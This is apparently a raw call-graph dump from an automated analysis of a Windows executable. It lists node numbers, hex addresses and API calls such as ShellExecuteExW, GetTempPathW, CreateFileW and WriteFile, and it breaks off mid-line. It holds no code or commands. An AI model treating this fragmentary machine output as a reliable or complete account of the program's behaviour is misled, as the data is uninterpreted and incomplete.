9301->9304 9305 406092 9302->9305 9306 40254d 2 API calls 9303->9306 9307 40243b lstrcmpW 9304->9307 9308 401411 2 API calls 9305->9308 9309 406048 9306->9309 9310 406068 9307->9310 9311 40609a 9308->9311 9312 40254d 2 API calls 9309->9312 9310->9305 9314 40254d 2 API calls 9310->9314 9313 401411 2 API calls 9311->9313 9312->9304 9315 4060a2 memset 9313->9315 9314->9299 9316 4060e1 9315->9316 9317 404594 2 API calls 9316->9317 9318 4060fe 9317->9318 9319 401329 2 API calls 9318->9319 9320 406109 9319->9320 9321 403b7f 19 API calls 9320->9321 9322 406112 9321->9322 9323 4061b1 9322->9323 9527 4021ed 9322->9527 9325 4062ee ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9323->9325 9327 4061c5 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9323->9327 9325->9257 9327->9253 9328 406150 9330 403b7f 19 API calls 9328->9330 9329 401429 2 API calls 9331 406147 9329->9331 9332 406168 ShellExecuteExW 9330->9332 9334 40254d 2 API calls 9331->9334 9335 406282 9332->9335 9336 40618c 9332->9336 9334->9328 9339 407776 55 API calls 9335->9339 9337 4061a0 CloseHandle 9336->9337 9338 406192 WaitForSingleObject 9336->9338 9758 402185 9337->9758 9338->9337 9341 40628c 9339->9341 9342 403e0d 16 API calls 9341->9342 9343 406291 9 API calls 9342->9343 9344 4062e1 9343->9344 9344->9325 9346 401b6c SetTimer GetMessageW DispatchMessageW KillTimer KiUserCallbackDispatcher 9345->9346 9347 401b9f GetVersionExW 9345->9347 9346->9347 9347->9043 9347->9044 9349 40112b 2 API calls 9348->9349 9350 403e38 GetCommandLineW 9349->9350 9351 404594 9350->9351 9352 4045ce 9351->9352 9355 4045a2 9351->9355 9354 401429 2 API calls 9352->9354 9356 4045c6 9352->9356 9353 401429 2 API calls 9353->9355 9354->9352 9355->9353 9355->9356 9356->9055 9358 401411 2 API calls 9357->9358 9364 402a79 9358->9364 9359 401362 2 API calls 9360 402b6c ??3@YAXPAX 9359->9360 9360->9058 9361 402b5f 9361->9359 9363 401411 2 API calls 9363->9364 9364->9361 9364->9363 9365 401429 ??2@YAPAXI ??3@YAXPAX 9364->9365 9367 401362 2 API calls 9364->9367 9805 4025c6 9364->9805 9808 40272e 9364->9808 9365->9364 9368 402ad9 ??3@YAXPAX 9367->9368 9369 4013e2 2 API calls 9368->9369 9370 402aee ??3@YAXPAX ??3@YAXPAX 9369->9370 9370->9364 9372 403d80 9371->9372 9373 403dbd 9372->9373 9374 403d9a lstrlenW lstrlenW 9372->9374 9373->9061 9373->9063 9819 401a85 9374->9819 9377 401f47 3 API calls 9376->9377 9378 404416 9377->9378 9379 401f9d 19 API calls 9378->9379 9380 40441d 9379->9380 9381 401f9d 19 API calls 9380->9381 9382 404429 9381->9382 9383 401f9d 19 API calls 9382->9383 9384 404435 9383->9384 9385 401f9d 19 API calls 9384->9385 9386 404441 9385->9386 9387 401f9d 19 API calls 9386->9387 9388 40444d 9387->9388 9389 401f9d 19 API calls 9388->9389 9390 404459 9389->9390 9391 401f9d 19 API calls 9390->9391 9392 404465 9391->9392 9393 404480 SHGetSpecialFolderPathW 9392->9393 9396 404533 #17 9392->9396 9397 401411 2 API calls 9392->9397 9398 401329 ??2@YAPAXI ??3@YAXPAX 9392->9398 9400 402f6c 7 API calls 9392->9400 9824 402425 ??3@YAXPAX ??3@YAXPAX 9392->9824 9393->9392 9394 40449a wsprintfW 9393->9394 9395 401411 2 API calls 9394->9395 9395->9392 9396->9064 9397->9392 9398->9392 9400->9392 9402 4022b0 2 API calls 9401->9402 9403 4025c2 9402->9403 9403->9107 9825 403e86 9404->9825 9406 404e56 9407 403e86 2 API calls 9406->9407 9408 404e65 9407->9408 9829 404343 9408->9829 9412 404e82 ??3@YAXPAX 9413 404343 3 API calls 9412->9413 9414 404e9d 9413->9414 9415 403ec1 2 API calls 9414->9415 9416 404ea8 ??3@YAXPAX wsprintfA 9415->9416 9845 403ef6 9416->9845 9418 404ed0 9419 403ef6 2 API calls 9418->9419 9420 404edb 9419->9420 9421 402844 9420->9421 9422 402851 9421->9422 9430 40dcfb 3 API calls 9422->9430 9423 402863 lstrlenA lstrlenA 9428 402890 9423->9428 9424 40296e 9424->9119 9424->9120 9425 40293b memmove 9425->9424 9425->9428 9426 4028db memcmp 9426->9424 9426->9428 9427 402918 memcmp 9427->9428 9428->9424 9428->9425 9428->9426 9428->9427 9431 40dcc7 GetLastError 9428->9431 9856 402640 9428->9856 9430->9423 9431->9428 9433 40243b lstrcmpW 9432->9433 9434 40461c 9433->9434 9435 40466c 9434->9435 9437 401329 2 API calls 9434->9437 9436 40243b lstrcmpW 9435->9436 9438 40468a 9436->9438 9439 404633 9437->9439 9442 40243b lstrcmpW 9438->9442 9440 401f9d 19 API calls 9439->9440 9441 40463a 9440->9441 9444 40254d 2 API calls 9441->9444 9443 4046a2 9442->9443 9446 40243b lstrcmpW 9443->9446 9445 404643 9444->9445 9447 401329 2 API calls 9445->9447 9448 4046ba 9446->9448 9449 40465c 9447->9449 9451 40243b lstrcmpW 9448->9451 9450 401f9d 19 API calls 9449->9450 9452 404663 9450->9452 9453 4046d2 9451->9453 9454 40254d 2 API calls 9452->9454 9455 4046e9 9453->9455 9456 4046d9 lstrcmpiW 9453->9456 9454->9435 9457 40243b lstrcmpW 9455->9457 9456->9455 9458 4046ff 9457->9458 9459 40243b lstrcmpW 9458->9459 9460 40472c 9459->9460 9461 404739 9460->9461 9859 403d1f 9460->9859 9463 40243b lstrcmpW 9461->9463 9467 40474d 9463->9467 9464 40476d 9465 40243b lstrcmpW 9464->9465 9472 404780 9465->9472 9467->9464 9468 40243b lstrcmpW 9467->9468 9863 403cc6 9467->9863 9468->9467 9469 4047a0 9471 40243b lstrcmpW 9469->9471 9473 4047ac 9471->9473 9472->9469 9474 40243b lstrcmpW 9472->9474 9867 403cf7 9472->9867 9475 40243b lstrcmpW 9473->9475 9474->9472 9476 4047bd 9475->9476 9477 40243b lstrcmpW 9476->9477 9478 4047ce 9477->9478 9479 4047e4 9478->9479 9480 4047db _wtol 9478->9480 9481 40243b lstrcmpW 9479->9481 9480->9479 9482 4047f0 9481->9482 9483 404800 9482->9483 9484 4047f7 _wtol 9482->9484 9485 40243b lstrcmpW 9483->9485 9484->9483 9486 40480c 9485->9486 9487 40243b lstrcmpW 9486->9487 9488 404824 9487->9488 9489 40243b lstrcmpW 9488->9489 9490 40483c 9489->9490 9490->9176 9875 4023dd 9491->9875 9495 404045 9494->9495 9496 404088 9494->9496 9497 4012f7 2 API calls 9495->9497 9498 403b7f 19 API calls 9495->9498 9496->9159 9496->9160 9497->9495 9499 404062 SetEnvironmentVariableW ??3@YAXPAX 9498->9499 9499->9495 9499->9496 9501 40393b 7 API calls 9500->9501 9502 403b69 9501->9502 9503 4039f6 7 API calls 9502->9503 9504 403b74 9503->9504 9505 4027c7 6 API calls 9504->9505 9506 403b7a 9505->9506 9506->9180 9662 4083b6 9506->9662 9879 408676 9507->9879 9509 404a55 ??2@YAPAXI 9510 404a64 9509->9510 9524 40dcfb 3 API calls 9510->9524 9511 404a85 9881 40b2fc 9511->9881 9887 40a7de _EH_prolog 9511->9887 9512 404a95 9513 404ab3 9512->9513 9514 404a99 9512->9514 9516 404ada ??2@YAPAXI 9513->9516 9519 403354 86 API calls 9513->9519 9515 407776 55 API calls 9514->9515 9523 404aa1 9515->9523 9517 404ae6 9516->9517 9518 404aed 9516->9518 9922 404292 9517->9922 9903 40150b 9518->9903 9521 404ac6 9519->9521 9521->9516 9521->9523 9523->9225 9524->9511 9528 402200 LoadLibraryA GetProcAddress 9527->9528 9529 4021fb 9527->9529 9530 40221b 9528->9530 9531 402223 9528->9531 9529->9323 9529->9328 9529->9329 9530->9529 9531->9530 10385 4021b9 LoadLibraryA GetProcAddress 9531->10385 9534 401411 2 API calls 9533->9534 9541 4048bc 9534->9541 9535 401329 2 API calls 9535->9541 9536 40494e 9537 404988 ??3@YAXPAX 9536->9537 9539 4048ab 3 API calls 9536->9539 9537->9276 9538 401429 2 API calls 9538->9541 9540 404985 9539->9540 9540->9537 9541->9535 9541->9536 9541->9538 9542 40243b lstrcmpW 9541->9542 9542->9541 9544 40661a 2 API calls 9543->9544 9545 4049af 9544->9545 9546 401f9d 19 API calls 9545->9546 9547 4049bd 9546->9547 9548 4024fc 2 API calls 9547->9548 9549 4049c7 9548->9549 9550 4049fd 9549->9550 9552 40254d ??2@YAPAXI ??3@YAXPAX 9549->9552 9551 40254d 2 API calls 9550->9551 9553 404a0a 9551->9553 9552->9549 9554 401f9d 19 API calls 9553->9554 9555 404a11 9554->9555 9556 40254d 2 API calls 9555->9556 9557 404a1b 9556->9557 9558 4073d1 21 API calls 9557->9558 9559 404a30 ??3@YAXPAX 9558->9559 9560 404a41 ctype 9559->9560 9560->9083 9562 40e8da ctype 3 API calls 9561->9562 9563 403e7e 9562->9563 9564 40e8da ctype 3 API calls 9563->9564 9565 40e943 ??3@YAXPAX 9564->9565 9565->9077 9567 40db53 2 API calls 9566->9567 9568 404ce8 9567->9568 9569 404d44 9568->9569 9571 4024fc 2 API calls 9568->9571 9570 4025ae 2 API calls 9569->9570 9572 404d4c 9570->9572 9573 404cf7 9571->9573 9574 403e86 2 API calls 9572->9574 9577 404db5 ??3@YAXPAX 9573->9577 9579 403354 86 API calls 9573->9579 9575 404d59 9574->9575 9576 403ef6 2 API calls 9575->9576 9578 404d66 9576->9578 9591 404db1 9577->9591 9580 403ef6 2 API calls 9578->9580 9581 404d1b 9579->9581 9582 404d73 9580->9582 9581->9577 9584 40db53 2 API calls 9581->9584 9583 403ef6 2 API calls 9582->9583 9585 404d80 9583->9585 9586 404d37 9584->9586 9587 40dd5f 2 API calls 9585->9587 9586->9577 9588 404d3b ??3@YAXPAX 9586->9588 9589 404d94 9587->9589 9588->9569 9589->9577 9590 404d9d ??3@YAXPAX 9589->9590 9590->9591 9591->9142 9593 4025ae 2 API calls 9592->9593 9609 4030a8 9593->9609 9594 403301 9595 403344 ??3@YAXPAX 9594->9595 9596 40334e 9595->9596 9596->9128 9596->9135 9597 401411 ??2@YAPAXI ??3@YAXPAX 9597->9609 9599 40272e ??2@YAPAXI ??3@YAXPAX MultiByteToWideChar 9599->9609 9600 401362 2 API calls 9601 4030f3 ??3@YAXPAX ??3@YAXPAX 9600->9601 9602 403303 9601->9602 9601->9609 10393 4029c3 9602->10393 9606 40331c ??3@YAXPAX 9606->9596 9607 4031e5 strncmp 9608 4031d0 strncmp 9607->9608 9607->9609 9608->9607 9608->9609 9609->9594 9609->9597 9609->9599 9609->9600 9609->9602 9609->9607 9610 401362 2 API calls 9609->9610 9611 402640 2 API calls 9609->9611 9614 402640 ??2@YAPAXI ??3@YAXPAX 9609->9614 9616 4023dd lstrcmpW 9609->9616 9617 402f6c 7 API calls 9609->9617 9619 403330 9609->9619 9620 4032b2 lstrcmpW 9609->9620 9624 401329 2 API calls 9609->9624 10387 402986 9609->10387 10392 402425 ??3@YAXPAX ??3@YAXPAX 9609->10392 9612 403252 ??3@YAXPAX 9610->9612 9611->9608 9613 402a69 9 API calls 9612->9613 9615 403263 lstrcmpW 9613->9615 9614->9609 9615->9609 9616->9609 9617->9609 9622 402f6c 7 API calls 9619->9622 9620->9609 9621 4032c0 lstrcmpW 9620->9621 9621->9609 9623 40333c 9622->9623 10411 402425 ??3@YAXPAX ??3@YAXPAX 9623->10411 9624->9609 9627 402f86 9626->9627 9628 402f7b 9626->9628 9630 408761 4 API calls 9627->9630 10413 402668 9628->10413 9631 402f92 9630->9631 9631->9132 9632->9132 9634 4024fc 2 API calls 9633->9634 9635 40485f 9634->9635 9636 40254d 2 API calls 9635->9636 9637 40486c 9636->9637 9638 404888 9637->9638 9639 401429 2 API calls 9637->9639 9640 40254d 2 API calls 9638->9640 9639->9637 9641 404892 9640->9641 9642 40408b 94 API calls 9641->9642 9643 40489d ??3@YAXPAX 9642->9643 9643->9176 9645 4040a2 lstrlenW 9644->9645 9646 4040ce 9644->9646 9647 401a85 4 API calls 9645->9647 9646->9176 9648 4040b8 9647->9648 9648->9645 9648->9646 9649 4040d5 9648->9649 9650 4024fc 2 API calls 9649->9650 9653 4040de 9650->9653 10418 402776 9653->10418 9654 403093 84 API calls 9655 40414c 9654->9655 9656 404156 ??3@YAXPAX ??3@YAXPAX 9655->9656 9657 40416d ??3@YAXPAX ??3@YAXPAX 9655->9657 9656->9646 9657->9646 9658->9189 9660 40661a 2 API calls 9659->9660 9661 403b48 9660->9661 9661->9178 9663 408646 9662->9663 9675 4083d5 ctype 9662->9675 9663->9184 9664 40661a 2 API calls 9664->9675 9665 40786b 23 API calls 9665->9675 9666 40243b lstrcmpW 9666->9675 9668 407674 23 API calls 9668->9675 9669 407613 23 API calls 9669->9675 9670 403b40 2 API calls 9670->9675 9671 401f9d 19 API calls 9671->9675 9672 407776 55 API calls 9672->9675 9673 403f48 4 API calls 9673->9675 9674 4073d1 21 API calls 9674->9675 9675->9663 9675->9664 9675->9665 9675->9666 9675->9668 9675->9669 9675->9670 9675->9671 9675->9672 9675->9673 9675->9674 9676 407717 25 API calls 9675->9676 9677 4073d1 21 API calls 9675->9677 10428 40744b 9675->10428 9676->9675 9678 408476 ??3@YAXPAX 9677->9678 9678->9675 9680 40243b lstrcmpW 9679->9680 9681 4082fd 9680->9681 9682 40830b 9681->9682 10432 4019f0 GetStdHandle WriteFile 9681->10432 9684 40831e 9682->9684 10433 4019f0 GetStdHandle WriteFile 9682->10433 9686 408333 9684->9686 10434 4019f0 GetStdHandle WriteFile 9684->10434 9688 408344 9686->9688 10435 4019f0 GetStdHandle WriteFile 9686->10435 9690 40243b lstrcmpW 9688->9690 9691 408351 9690->9691 9694 40835f 9691->9694 10436 4019f0 GetStdHandle WriteFile 9691->10436 9693 40243b lstrcmpW 9695 40836c 9693->9695 9694->9693 9696 40837a 9695->9696 10437 4019f0 GetStdHandle WriteFile 9695->10437 9698 40243b lstrcmpW 9696->9698 9699 408387 9698->9699 9700 408395 9699->9700 10438 4019f0 GetStdHandle WriteFile 9699->10438 9702 40243b lstrcmpW 9700->9702 9703 4083a2 9702->9703 9704 4083b2 9703->9704 10439 4019f0 GetStdHandle WriteFile 9703->10439 9704->9180 9707 407636 9706->9707 9708 407658 9707->9708 9709 40764b 9707->9709 10443 407186 9708->10443 10440 407154 9709->10440 9712 407653 9713 4073d1 21 API calls 9712->9713 9714 407671 9713->9714 9714->9222 9716 407689 9715->9716 9717 40716d 2 API calls 9716->9717 9718 407694 9717->9718 9719 4073d1 21 API calls 9718->9719 9720 4076a5 9719->9720 9720->9222 9722 401411 2 API calls 9721->9722 9723 403f96 9722->9723 9724 402535 2 API calls 9723->9724 9725 403f9f GetTempPathW 9724->9725 9726 403fb8 9725->9726 9731 403fcf 9725->9731 9727 402535 2 API calls 9726->9727 9728 403fc3 GetTempPathW 9727->9728 9728->9731 9729 402535 2 API calls 9730 403ff2 wsprintfW 9729->9730 9730->9731 9731->9729 9732 404009 GetFileAttributesW 9731->9732 9733 40402d 9731->9733 9732->9731 9732->9733 9733->9207 9735 40787e 9734->9735 10449 40719f 9735->10449 9738 4073d1 21 API calls 9739 4078b3 9738->9739 9739->9225 9741 403e21 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9740->9741 9742 403e16 9740->9742 9741->9226 9743 402c86 16 API calls 9742->9743 9743->9741 9745 40243b lstrcmpW 9744->9745 9746 40455d 9745->9746 9747 404592 9746->9747 9748 401329 2 API calls 9746->9748 9747->9277 9749 40456c 9748->9749 9750 403b7f 19 API calls 9749->9750 9751 404572 9750->9751 9751->9747 9752 401429 2 API calls 9751->9752 9752->9747 9754 4012f7 2 API calls 9753->9754 9755 4043d4 9754->9755 9756 40254d 2 API calls 9755->9756 9757 4043df 9756->9757 9757->9266 9759 4021a9 9758->9759 9760 40218e LoadLibraryA GetProcAddress 9758->9760 9759->9323 9760->9759 9762 40661a 2 API calls 9761->9762 9763 403f50 9762->9763 9764 401411 2 API calls 9763->9764 9765 403f5e 9764->9765 9765->9251 9767 404cb1 ??3@YAXPAX 9766->9767 9769 404b15 9766->9769 9770 404cb7 9767->9770 9768 404b29 GetDriveTypeW 9768->9767 9771 404b55 9768->9771 9769->9767 9769->9768 9770->9236 9772 403f85 6 API calls 9771->9772 9773 404b63 CreateFileW 9772->9773 9774 404b89 9773->9774 9775 404c7b ??3@YAXPAX ??3@YAXPAX 9773->9775 9776 401411 2 API calls 9774->9776 9775->9770 9777 404b92 9776->9777 9778 401329 2 API calls 9777->9778 9779 404b9f 9778->9779 9780 40254d 2 API calls 9779->9780 9781 404bad 9780->9781 9782 4013e2 2 API calls 9781->9782 9783 404bb9 9782->9783 9784 40254d 2 API calls 9783->9784 9785 404bc7 9784->9785 9786 40254d 2 API calls 9785->9786 9787 404bd4 9786->9787 9788 4013e2 2 API calls 9787->9788 9789 404be0 9788->9789 9790 40254d 2 API calls 9789->9790 9791 404bed 9790->9791 9792 40254d 2 API calls 9791->9792 9793 404bf6 9792->9793 9794 4013e2 2 API calls 9793->9794 9795 404c02 9794->9795 9796 40254d 2 API calls 9795->9796 9797 404c0b 9796->9797 9798 402776 3 API calls 9797->9798 9799 404c1d WriteFile ??3@YAXPAX CloseHandle 9798->9799 9800 404c4b 9799->9800 9801 404c8c 9799->9801 9800->9801 9802 404c53 SetFileAttributesW ShellExecuteW ??3@YAXPAX 9800->9802 9803 402c86 16 API calls 9801->9803 9802->9775 9804 404c94 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9803->9804 9804->9770 9814 4022b0 9805->9814 9809 401411 2 API calls 9808->9809 9810 40273a 9809->9810 9811 402772 9810->9811 9812 402535 2 API calls 9810->9812 9811->9364 9813 402757 MultiByteToWideChar 9812->9813 9813->9811 9815 4022ea 9814->9815 9816 4022be ??2@YAPAXI 9814->9816 9815->9364 9816->9815 9818 4022cf 9816->9818 9817 4022e2 ??3@YAXPAX 9817->9815 9818->9817 9818->9818 9820 401ae3 9819->9820 9821 401a97 9819->9821 9820->9373 9821->9820 9822 401abc CharUpperW CharUpperW 9821->9822 9822->9821 9823 401af3 CharUpperW CharUpperW 9822->9823 9823->9820 9824->9392 9826 403e9e 9825->9826 9827 4022b0 2 API calls 9826->9827 9828 403eac 9827->9828 9828->9406 9830 40435e 9829->9830 9831 404375 9830->9831 9832 40436a 9830->9832 9833 4025ae 2 API calls 9831->9833 9849 4025f6 9832->9849 9834 40437e 9833->9834 9836 4022b0 2 API calls 9834->9836 9838 404387 9836->9838 9837 404373 9841 403ec1 9837->9841 9838->9838 9839 4025f6 2 API calls 9838->9839 9840 4043b5 ??3@YAXPAX 9839->9840 9840->9837 9842 403ecd 9841->9842 9844 403ede 9841->9844 9843 4022b0 2 API calls 9842->9843 9843->9844 9844->9412 9846 403f06 9845->9846 9846->9846 9852 4022fc 9846->9852 9848 403f13 9848->9418 9850 4022b0 2 API calls 9849->9850 9851 402610 9850->9851 9851->9837 9853 402340 9852->9853 9854 402310 9852->9854 9853->9848 9855 4022b0 2 API calls 9854->9855 9855->9853 9857 4022fc 2 API calls 9856->9857 9858 40264a 9857->9858 9858->9428 9860 403d3d 9859->9860 9871 403c63 9860->9871 9864 403cd3 9863->9864 9865 403c63 _wtol 9864->9865 9866 403cf4 9865->9866 9866->9467 9868 403d04 9867->9868 9869 403c63 _wtol 9868->9869 9870 403d1c 9869->9870 9870->9472 9872 403c6d 9871->9872 9873 403c88 _wtol 9872->9873 9874 403cc1 9872->9874 9873->9872 9874->9461 9876 4023e8 9875->9876 9877 402411 9876->9877 9878 4023f4 lstrcmpW 9876->9878 9877->9182 9878->9876 9878->9877 9880 408679 9879->9880 9880->9509 9882 40b30d 9881->9882 9886 40dcfb 3 API calls 9882->9886 9883 40b321 9884 40b331 9883->9884 9927 40b163 9883->9927 9884->9512 9886->9883 9888 40a7fe 9887->9888 9889 40b2fc 11 API calls 9888->9889 9890 40a823 9889->9890 9891 40a845 9890->9891 9892 40a82c 9890->9892 9955 40cc59 _EH_prolog 9891->9955 9958 40a3fe 9892->9958 9904 40151e 9903->9904 9905 401329 2 API calls 9904->9905 9906 40152b 9905->9906 9907 401429 2 API calls 9906->9907 9908 401534 CreateThread 9907->9908 9909 401563 9908->9909 9910 401568 WaitForSingleObject 9908->9910 10379 40129c 9908->10379 9911 40786b 23 API calls 9909->9911 9912 401585 9910->9912 9913 4015b7 9910->9913 9911->9910 9916 4015a3 9912->9916 9919 401594 9912->9919 9914 4015b3 9913->9914 9915 4015bf GetExitCodeThread 9913->9915 9914->9523 9917 4015d6 9915->9917 9918 407776 55 API calls 9916->9918 9917->9914 9917->9919 9920 401605 SetLastError 9917->9920 9918->9914 9919->9914 9921 407776 55 API calls 9919->9921 9920->9919 9921->9914 9923 401411 2 API calls 9922->9923 9924 4042ab 9923->9924 9925 401411 2 API calls 9924->9925 9926 4042b7 9925->9926 9926->9518 9940 40f0b6 9927->9940 9929 40b192 9929->9884 9930 40b17e 9930->9929 9943 40adc3 9930->9943 9933 40b297 ??3@YAXPAX 9933->9929 9934 40b2a2 ??3@YAXPAX 9934->9929 9936 40b27a memmove 9937 40b1d9 9936->9937 9937->9933 9937->9934 9937->9936 9938 40b2ac memcpy 9937->9938 9939 40dcfb 3 API calls 9938->9939 9939->9934 9951 40f06b 9940->9951 9944 40add0 9943->9944 9945 40ae0d memcpy 9943->9945 9946 40add5 ??2@YAPAXI 9944->9946 9947 40adfb 9944->9947 9945->9937 9948 40adfd ??3@YAXPAX 9946->9948 9949 40ade5 memmove 9946->9949 9947->9948 9948->9945 9949->9948 9952 40f0af 9951->9952 9953 40f07d 9951->9953 9952->9930 9953->9952 9954 40dcc7 GetLastError 9953->9954 9954->9953 9966 40c9fc 9955->9966 10362 40a28e 9958->10362 9988 40a0bf 9966->9988 10111 40a030 9988->10111 10112 40e8da ctype 3 API calls 10111->10112 10113 40a039 10112->10113 10114 40e8da ctype 3 API calls 10113->10114 10115 40a041 10114->10115 10116 40e8da ctype 3 API calls 10115->10116 10117 40a049 10116->10117 10118 40e8da ctype 3 API calls 10117->10118 10119 40a051 10118->10119 10120 40e8da ctype 3 API calls 10119->10120 10121 40a059 10120->10121 10122 40e8da ctype 3 API calls 10121->10122 10123 40a061 10122->10123 10124 40e8da ctype 3 API calls 10123->10124 10125 40a06b 10124->10125 10126 40e8da ctype 3 API calls 10125->10126 10127 40a073 10126->10127 10128 40e8da ctype 3 API calls 10127->10128 10129 40a080 10128->10129 10130 40e8da ctype 3 API calls 10129->10130 10131 40a088 10130->10131 10132 40e8da ctype 3 API calls 10131->10132 10133 40a095 10132->10133 10134 40e8da ctype 3 API calls 10133->10134 10135 40a09d 10134->10135 10136 40e8da ctype 3 API calls 10135->10136 10137 40a0aa 10136->10137 10138 40e8da ctype 3 API calls 10137->10138 10139 40a0b2 10138->10139 10363 40e8da ctype 3 API calls 10362->10363 10364 40a29c 10363->10364 10380 4012a5 10379->10380 10381 4012b8 10379->10381 10380->10381 10382 4012a7 Sleep 10380->10382 10383 4012f1 10381->10383 10384 4012e3 EndDialog 10381->10384 10382->10380 10384->10383 10386 4021db 10385->10386 10386->9530 10388 4025ae 2 API calls 10387->10388 10389 402992 10388->10389 10390 4029be 10389->10390 10391 402640 2 API calls 10389->10391 10390->9609 10391->10389 10392->9609 10394 4029d2 10393->10394 10395 4029de 10393->10395 10412 4019f0 GetStdHandle WriteFile 10394->10412 10397 4025ae 2 API calls 10395->10397 10401 4029e8 10397->10401 10398 4029d9 10410 402425 ??3@YAXPAX ??3@YAXPAX 10398->10410 10399 402a13 10400 40272e 3 API calls 10399->10400 10402 402a25 10400->10402 10401->10399 10405 402640 2 API calls 10401->10405 10403 402a33 10402->10403 10404 402a47 10402->10404 10406 407776 55 API calls 10403->10406 10407 407776 55 API calls 10404->10407 10405->10401 10408 402a42 ??3@YAXPAX ??3@YAXPAX 10406->10408 10407->10408 10408->10398 10410->9606 10411->9595 10412->10398 10414 4012f7 2 API calls 10413->10414 10415 402676 10414->10415 10416 4012f7 2 API calls 10415->10416 10417 402682 10416->10417 10417->9627 10419 4025ae 2 API calls 10418->10419 10420 402785 10419->10420 10421 4027c1 10420->10421 10424 402628 10420->10424 10421->9654 10425 402634 10424->10425 10426 40263a WideCharToMultiByte 10424->10426 10427 4022b0 2 API calls 10425->10427 10426->10421 10427->10426 10429 407456 10428->10429 10430 40745b 10428->10430 10429->9675 10430->10429 10431 4073d1 21 API calls 10430->10431 10431->10429 10432->9682 10433->9684 10434->9686 10435->9688 10436->9694 10437->9696 10438->9700 10439->9704 10441 40661a 2 API calls 10440->10441 10442 40715c 10441->10442 10442->9712 10446 40716d 10443->10446 10447 40661a 2 API calls 10446->10447 10448 407175 10447->10448 10448->9712 10450 40661a 2 API calls 10449->10450 10451 4071a7 10450->10451 10451->9738 8032 40f3f1 8035 4024e7 8032->8035 8040 40245a 8035->8040 8038 4024f5 8039 4024f6 malloc 8041 40246a 8040->8041 8047 402466 8040->8047 8042 40247a GlobalMemoryStatusEx 8041->8042 8041->8047 8043 402488 8042->8043 8042->8047 8043->8047 8048 401f9d 8043->8048 8047->8038 8047->8039 8049 401fb4 8048->8049 8050 401fe5 GetLastError wsprintfW GetEnvironmentVariableW GetLastError 8049->8050 8051 401fdb 8049->8051 8052 402095 SetLastError 8050->8052 8053 40201d ??2@YAPAXI GetEnvironmentVariableW 8050->8053 8068 407717 8051->8068 8052->8051 8058 4020ac 8052->8058 8054 40204c GetLastError 8053->8054 8067 40207e ??3@YAXPAX 8053->8067 8055 402052 8054->8055 8054->8067 8061 402081 8055->8061 8062 40205c lstrcmpiW 8055->8062 8057 4020cb lstrlenA ??2@YAPAXI 8059 402136 MultiByteToWideChar 8057->8059 8060 4020fc GetLocaleInfoW 8057->8060 8058->8057 8075 401f47 8058->8075 8059->8051 8060->8059 8065 402123 _wtol 8060->8065 8061->8052 8066 40206b ??3@YAXPAX 8062->8066 8062->8067 8064 4020c1 8064->8057 8065->8059 8066->8061 8067->8061 8082 40661a 8068->8082 8071 40773c IsBadReadPtr 8073 40774e 8071->8073 8086 4073d1 8073->8086 8076 401f51 GetUserDefaultUILanguage 8075->8076 8077 401f95 8075->8077 8078 401f72 GetSystemDefaultUILanguage 8076->8078 8079 401f6e 8076->8079 8077->8064 8078->8077 8080 401f7e GetSystemDefaultLCID 8078->8080 8079->8064 8080->8077 8081 401f8e 8080->8081 8081->8077 8083 406643 8082->8083 8084 40666f IsWindow 8082->8084 8083->8084 8085 40664b GetSystemMetrics GetSystemMetrics 8083->8085 8084->8071 8084->8073 8085->8084 8087 4073e0 8086->8087 8088 407444 8086->8088 8087->8088 8098 4024fc 8087->8098 8088->8047 8090 4073f1 8091 4024fc 2 API calls 8090->8091 8092 4073fc 8091->8092 8102 403b7f 8092->8102 8095 403b7f 19 API calls 8096 40740e ??3@YAXPAX ??3@YAXPAX 8095->8096 8096->8088 8099 402513 8098->8099 8111 40112b 8099->8111 8101 40251e 8101->8090 8175 403880 8102->8175 8104 403b59 8116 40393b 8104->8116 8106 403b69 8139 4039f6 8106->8139 8108 403b74 8162 4027c7 8108->8162 8112 401177 8111->8112 8113 401139 ??2@YAPAXI 8111->8113 8112->8101 8113->8112 8115 40115a 8113->8115 8114 40116f ??3@YAXPAX 8114->8112 8115->8114 8115->8115 8198 401411 8116->8198 8120 403954 8205 40254d 8120->8205 8122 403961 8123 4024fc 2 API calls 8122->8123 8124 40396e 8123->8124 8209 403805 8124->8209 8127 401362 2 API calls 8128 403992 8127->8128 8129 40254d 2 API calls 8128->8129 8130 40399f 8129->8130 8131 4024fc 2 API calls 8130->8131 8132 4039ac 8131->8132 8133 403805 3 API calls 8132->8133 8134 4039bc ??3@YAXPAX 8133->8134 8135 4024fc 2 API calls 8134->8135 8136 4039d3 8135->8136 8137 403805 3 API calls 8136->8137 8138 4039e2 ??3@YAXPAX ??3@YAXPAX 8137->8138 8138->8106 8140 401411 2 API calls 8139->8140 8141 403a04 8140->8141 8142 401362 2 API calls 8141->8142 8143 403a0f 8142->8143 8144 40254d 2 API calls 8143->8144 8145 403a1c 8144->8145 8146 4024fc 2 API calls 8145->8146 8147 403a29 8146->8147 8148 403805 3 API calls 8147->8148 8149 403a39 ??3@YAXPAX 8148->8149 8150 401362 2 API calls 8149->8150 8151 403a4d 8150->8151 8152 40254d 2 API calls 8151->8152 8153 403a5a 8152->8153 8154 4024fc 2 API calls 8153->8154 8155 403a67 8154->8155 8156 403805 3 API calls 8155->8156 8157 403a77 ??3@YAXPAX 8156->8157 8158 4024fc 2 API calls 8157->8158 8159 403a8e 8158->8159 8160 403805 3 API calls 8159->8160 8161 403a9d ??3@YAXPAX ??3@YAXPAX 8160->8161 8161->8108 8163 401411 2 API calls 8162->8163 8164 4027d5 8163->8164 8165 4027e5 ExpandEnvironmentStringsW 8164->8165 8166 40112b 2 API calls 8164->8166 8167 402809 8165->8167 8168 4027fe ??3@YAXPAX 8165->8168 8166->8165 8234 402535 8167->8234 8169 402840 8168->8169 8169->8095 8172 402824 8173 401362 2 API calls 8172->8173 8174 402838 ??3@YAXPAX 8173->8174 8174->8169 8176 401411 2 API calls 8175->8176 8177 40388e 8176->8177 8178 401362 2 API calls 8177->8178 8179 403899 8178->8179 8180 40254d 2 API calls 8179->8180 8181 4038a6 8180->8181 8182 4024fc 2 API calls 8181->8182 8183 4038b3 8182->8183 8184 403805 3 API calls 8183->8184 8185 4038c3 ??3@YAXPAX 8184->8185 8186 401362 2 API calls 8185->8186 8187 4038d7 8186->8187 8188 40254d 2 API calls 8187->8188 8189 4038e4 8188->8189 8190 4024fc 2 API calls 